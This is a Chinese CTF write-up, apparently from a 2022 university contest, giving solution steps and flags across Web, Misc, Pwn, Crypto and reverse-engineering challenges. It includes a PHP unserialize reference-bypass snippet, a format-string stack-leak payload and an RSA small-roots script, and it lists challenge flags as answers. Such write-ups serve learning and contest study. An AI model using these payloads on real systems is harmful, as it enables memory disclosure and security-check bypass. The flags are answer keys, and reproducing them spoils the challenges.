Web
你比香农都牛逼
直接看源码124.221.190.49/assets/index.9c4d6006.js

控制台运行:flag{blue-whalerdle}
very old php game

old php game

Baby Unserialize
利用=&
对变量进行引用
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32
| <?php
require_once "flag.php";
class Foo { private $i_am_flag; public $i_am_not_flag;
public function __construct() { $this->i_am_not_flag =& $this->i_am_flag; }
}
$a = new Foo;
echo base64_encode(serialize($a));
|

企业级项目实训
Log4j2

Misc
缺了好多工具,慢慢补全吧
Checkin

simplepcap
wireshark,导出tcp链接的原始数据

再用ida逆一下

warmatap
每个案件对应不同的音符,听就行
出题人手抖多按了几个键,flag里别写就行了
bitjungle
盲水印可以解出另一个附件

里面是一个图,图里有个加密的压缩包,解不出来了
赛后听群里师傅说,在小黄鸭图片的末尾有点东西,于是拖出来看看,转为utf8编码后,才发现这么个东西

在线工具解一下:兽音译者在线编码解码 - 兽音翻译咆哮体加密解密 (iiilab.com)

解压缩,getflag
flag{bitjungle_@_2022ouc_security_competation}
ps:这广告最后还是没打好,flag就没几个师傅看见
问卷
略
Pwn
flag_in_stack
白给格式化字符串
%9$p%10$p%11$p%12$p%13$p%14$p


最后flag是
flag{22318482-897e-4e4a-9b99-b9389177f8f3}
Crypto
rsa0
网上有exp,用sage跑
1 2 3 4 5 6 7
| n=99458509668079240764185524318888149882712572088614461971298107463369834453088459456711728470353911743012102202401459506420834538745340718629443665356118527820744084764722600596423213368145625200314910178619550190760027522939148808084672161717108834912031065957105792556025057670251126369910028034643093394503 c1=89197280386921965661197790711420784410262382208534132234085116791910615673169858527481477831574905081301421275552903510097047200583014062866861073549357212721466816307907010360542055607004721289805632304584130841060138244596306574846436860126904020143491716153319277054077200643464827586604236845487354987915 c2=45959797671430481467332101148072465819627575670155123389013237210739239421635837916637386390202868822695476269782607749447310008721672509747039543011018639490424678005705921693560042291238100913368239888847987849534236313165006247961048196341554357508978141969877614250433715368123748776872299192957911667056 RR.<x>=Zmod(n)[] f=x**Integer(2)-(c1+c2)*x + c1*c2 f.small_roots(X=2^400)
|

Re
easyxor


xpu
脱壳,flag用base64加密了

asm_master
gcc -c main.S -o main.o

oh_my_python
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28
| $ uncompyle6 chall.pyc > chall.py
$ cat chall.py
def chall(): flag = input() l = 'CKNOPWY_acfghkloruwy{}' index = [10, 14, 8, 11, 20, 0, 8, 2, 7, 6, 3, 17, 7, 1, 3, 5, 2, 7, 12, 3, 5, 7, 4, 19, 9, 7, 18, 15, 16, 13, 21] answer = '' for i in index: answer += l[i]
if flag == answer: print 'Right!' else: print 'No!'
if __name__ == '__main__': chall()
|
